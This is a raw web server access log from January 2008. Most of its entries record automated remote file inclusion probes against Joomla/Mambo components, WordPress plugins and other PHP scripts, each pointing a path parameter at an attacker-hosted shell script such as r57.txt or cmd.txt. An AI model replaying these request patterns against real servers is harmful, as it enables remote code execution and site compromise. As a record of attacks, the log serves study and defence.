82.194.74.238 - - [20/Jan/2008:16:00:43 -0800] "GET //index.php?option=com_lmo&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
82.194.74.238 - - [20/Jan/2008:16:00:44 -0800] "GET /logs//index.php?option=com_lmo&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
74.6.8.75 - - [20/Jan/2008:16:00:44 -0800] "GET /logs/access_070716.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.52.142.29 - - [20/Jan/2008:16:01:19 -0800] "GET /logs//index.php?option=com_lmo&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
72.52.142.29 - - [20/Jan/2008:16:01:19 -0800] "GET //index.php?option=com_lmo&task=cat_view&gid=&mosConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
66.249.19.17 - - [20/Jan/2008:16:01:39 -0800] "GET /logs/access_071014.log/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.249.19.17 - - [20/Jan/2008:16:01:40 -0800] "GET /logs/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.67.192.5 - - [20/Jan/2008:16:02:10 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cnelbalis.com/ficheros_usuario/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.5 - - [20/Jan/2008:16:02:10 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cnelbalis.com/ficheros_usuario/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.55.208.229 - - [20/Jan/2008:16:02:20 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.229 - - [20/Jan/2008:16:02:20 -0800] "GET /?N=A HTTP/1.0" 200 1032 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
77.232.68.10 - - [20/Jan/2008:16:02:30 -0800] "GET /logs/access_071014.log/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.10 - - [20/Jan/2008:16:02:30 -0800] "GET /logs/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.19.225 - - [20/Jan/2008:16:03:09 -0800] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
201.1.1.12 - - [20/Jan/2008:16:03:23 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.62.196.11 - - [20/Jan/2008:16:03:27 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://seucu.us/frame.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.62.196.11 - - [20/Jan/2008:16:03:28 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://seucu.us/frame.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.1.1.12 - - [20/Jan/2008:16:03:34 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.29.188.25 - - [20/Jan/2008:16:04:17 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.29.188.25 - - [20/Jan/2008:16:04:17 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://190.8.128.58/.../test.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.234.95.152 - - [20/Jan/2008:16:04:23 -0800] "GET / HTTP/1.1" 200 1048 "-" "blackspider" "www.galf.org"
72.30.216.93 - - [20/Jan/2008:16:04:43 -0800] "GET /logs/access_070826.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.230.6.113 - - [20/Jan/2008:16:04:43 -0800] "GET /logs/access_070820.log/rfihttp://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.6.113 - - [20/Jan/2008:16:04:43 -0800] "GET /rfihttp://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.6.113 - - [20/Jan/2008:16:04:43 -0800] "GET /logs/rfihttp://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.246.22.20 - - [20/Jan/2008:16:04:58 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://pyta.za.pl/shell.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
64.246.22.20 - - [20/Jan/2008:16:04:58 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://pyta.za.pl/shell.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
205.134.242.91 - - [20/Jan/2008:16:05:03 -0800] "GET /get_reminders.php?includedir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.246.22.20 - - [20/Jan/2008:16:05:20 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://pyta.za.pl/shell.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
64.246.22.20 - - [20/Jan/2008:16:05:20 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://pyta.za.pl/shell.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
88.131.106.16 - - [20/Jan/2008:16:05:30 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [20/Jan/2008:16:05:31 -0800] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
194.30.169.80 - - [20/Jan/2008:16:06:32 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://teamuw.com/.xpl/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
124.32.128.178 - - [20/Jan/2008:16:06:45 -0800] "GET /logs/access_071014.log/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
124.32.128.178 - - [20/Jan/2008:16:06:46 -0800] "GET /logs/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.230.6.113 - - [20/Jan/2008:16:07:05 -0800] "GET /logs/access_070806.log/rfihttp://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.56.111.194 - - [20/Jan/2008:16:09:16 -0800] "GET /logs/access_071014.log/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.111.176.86 - - [20/Jan/2008:16:09:49 -0800] "GET /logs/access_071014.log/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.86 - - [20/Jan/2008:16:09:49 -0800] "GET /logs/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.142.212.190 - - [20/Jan/2008:16:10:20 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.galf.org"
209.40.194.211 - - [20/Jan/2008:16:12:45 -0800] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://urbanmos.com/events/log/setup_pages.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.230.197.170 - - [20/Jan/2008:16:13:22 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.230.197.170 - - [20/Jan/2008:16:13:22 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.218.217.16 - - [20/Jan/2008:16:14:42 -0800] "GET /logs/access_071014.log/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.218.217.16 - - [20/Jan/2008:16:14:43 -0800] "GET /logs/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.33.2.131 - - [20/Jan/2008:16:14:55 -0800] "GET /index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.8.75 - - [20/Jan/2008:16:15:56 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 1179648 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:16:16:01 -0800] "GET /logs/access_070826.log/index.php?include=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:16:16:02 -0800] "GET /logs/index.php?include=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.93.255.93 - - [20/Jan/2008:16:17:08 -0800] "GET /logs/access_071210.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://sunbeam-talbot-spares.co.uk/forum/inc/languages/lang.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
77.93.255.93 - - [20/Jan/2008:16:17:08 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://sunbeam-talbot-spares.co.uk/forum/inc/languages/lang.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
77.93.255.93 - - [20/Jan/2008:16:17:09 -0800] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://sunbeam-talbot-spares.co.uk/forum/inc/languages/lang.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:16:17:22 -0800] "GET /logs/access_070806.log/?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:16:17:22 -0800] "GET /?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:16:17:22 -0800] "GET /logs/?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 200 5619 "-" "libwww-perl/5.808" "www.galf.org"
69.41.238.2 - - [20/Jan/2008:16:17:27 -0800] "GET /logs/access_071112.log/?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:16:18:41 -0800] "GET /logs/access_070820.log/index.php?pag=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:16:19:09 -0800] "GET /logs/access_071217.log/index.php?x=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:16:19:09 -0800] "GET /logs/index.php?x=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.52.102.66 - - [20/Jan/2008:16:22:00 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:16:22:59 -0800] "GET /logs/access_071210.log/index.php?x=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.79.190.28 - - [20/Jan/2008:16:25:35 -0800] "GET /logs/access_071014.log/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.79.190.28 - - [20/Jan/2008:16:25:35 -0800] "GET /logs/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
200.222.110.249 - - [20/Jan/2008:16:25:42 -0800] "GET /logs/access_071224.log/index.php?include=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.96.22.186 - - [20/Jan/2008:16:28:33 -0800] "GET /get_reminders.php?includedir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.99.64 - - [20/Jan/2008:16:28:50 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.6.223.16 - - [20/Jan/2008:16:29:07 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.6.223.16 - - [20/Jan/2008:16:30:01 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
8.6.223.16 - - [20/Jan/2008:16:30:04 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.126.106 - - [20/Jan/2008:16:30:28 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
59.106.20.28 - - [20/Jan/2008:16:30:38 -0800] "GET /logs/access_070806.log/index2.php?pag=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [20/Jan/2008:16:30:38 -0800] "GET /index2.php?pag=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [20/Jan/2008:16:30:39 -0800] "GET /logs/index2.php?pag=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [20/Jan/2008:16:30:39 -0800] "GET /logs/access_071008.log/index2.php?pag=http://www.laila.jp/item_pics/d3rf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.242.169 - - [20/Jan/2008:16:30:45 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
218.150.160.85 - - [20/Jan/2008:16:31:08 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.150.160.85 - - [20/Jan/2008:16:31:08 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.79.216.105 - - [20/Jan/2008:16:31:09 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.110.144.106 - - [20/Jan/2008:16:31:10 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
200.11.67.242 - - [20/Jan/2008:16:31:11 -0800] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [20/Jan/2008:16:31:11 -0800] "GET //skin/zero_vote/error.php?dir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.11.67.242 - - [20/Jan/2008:16:31:12 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.52.114.58 - - [20/Jan/2008:16:31:18 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.70.113.10 - - [20/Jan/2008:16:31:33 -0800] "GET /logs/access_071014.log/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.70.113.10 - - [20/Jan/2008:16:31:34 -0800] "GET /logs/index.php?table=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.19.144.26 - - [20/Jan/2008:16:32:00 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.19.144.26 - - [20/Jan/2008:16:32:01 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
205.234.242.169 - - [20/Jan/2008:16:32:06 -0800] "GET /logs/access_080107.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.242.169 - - [20/Jan/2008:16:32:06 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.242.169 - - [20/Jan/2008:16:32:06 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.126.66 - - [20/Jan/2008:16:32:43 -0800] "GET /rfihttp://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.114.58 - - [20/Jan/2008:16:32:55 -0800] "GET /logs/access_080107.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.114.58 - - [20/Jan/2008:16:32:56 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.114.58 - - [20/Jan/2008:16:32:56 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.147.239.150 - - [20/Jan/2008:16:32:57 -0800] "GET /logs/access_070806.log/?mosConfig_absolute_path=http://serge.izoard1.free.fr/modules/xgallery/asc???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.147.239.150 - - [20/Jan/2008:16:32:57 -0800] "GET /?mosConfig_absolute_path=http://serge.izoard1.free.fr/modules/xgallery/asc???????????????? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
66.147.239.150 - - [20/Jan/2008:16:32:58 -0800] "GET /logs/?mosConfig_absolute_path=http://serge.izoard1.free.fr/modules/xgallery/asc???????????????? HTTP/1.1" 200 5619 "-" "libwww-perl/5.808" "www.galf.org"
64.91.244.2 - - [20/Jan/2008:16:32:59 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.147.239.150 - - [20/Jan/2008:16:33:14 -0800] "GET /logs/access_071112.log/?mosConfig_absolute_path=http://serge.izoard1.free.fr/modules/xgallery/asc???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.110.144.106 - - [20/Jan/2008:16:33:37 -0800] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.110.144.106 - - [20/Jan/2008:16:33:37 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.110.144.106 - - [20/Jan/2008:16:33:51 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
72.30.214.235 - - [20/Jan/2008:16:35:02 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.91.244.2 - - [20/Jan/2008:16:35:12 -0800] "GET /logs/access_080107.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.91.244.2 - - [20/Jan/2008:16:35:12 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.91.244.2 - - [20/Jan/2008:16:35:12 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.242.169 - - [20/Jan/2008:16:35:37 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.102.66 - - [20/Jan/2008:16:36:31 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.102.66 - - [20/Jan/2008:16:36:31 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.182.2 - - [20/Jan/2008:16:37:03 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.simplyellis.com/Scripts/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.182.2 - - [20/Jan/2008:16:37:03 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.simplyellis.com/Scripts/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.182.2 - - [20/Jan/2008:16:37:03 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.simplyellis.com/Scripts/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.114.58 - - [20/Jan/2008:16:37:17 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
210.118.170.87 - - [20/Jan/2008:16:37:41 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.110.144.106 - - [20/Jan/2008:16:37:47 -0800] "GET /logs/access_071022.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
211.230.148.86 - - [20/Jan/2008:16:37:59 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.110.144.106 - - [20/Jan/2008:16:38:28 -0800] "GET /logs/access_071014.log//skin/zero_vote/error.php?dir=http://www.mobygeek.net/blog-old/wp-content/uploads/.off/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
193.19.225.162 - - [20/Jan/2008:16:38:45 -0800] "GET /logs/access_071217.log//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.19.225.162 - - [20/Jan/2008:16:38:45 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.19.225.162 - - [20/Jan/2008:16:38:45 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.134.242.91 - - [20/Jan/2008:16:38:46 -0800] "GET /logs/access_080107.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.134.242.91 - - [20/Jan/2008:16:38:46 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
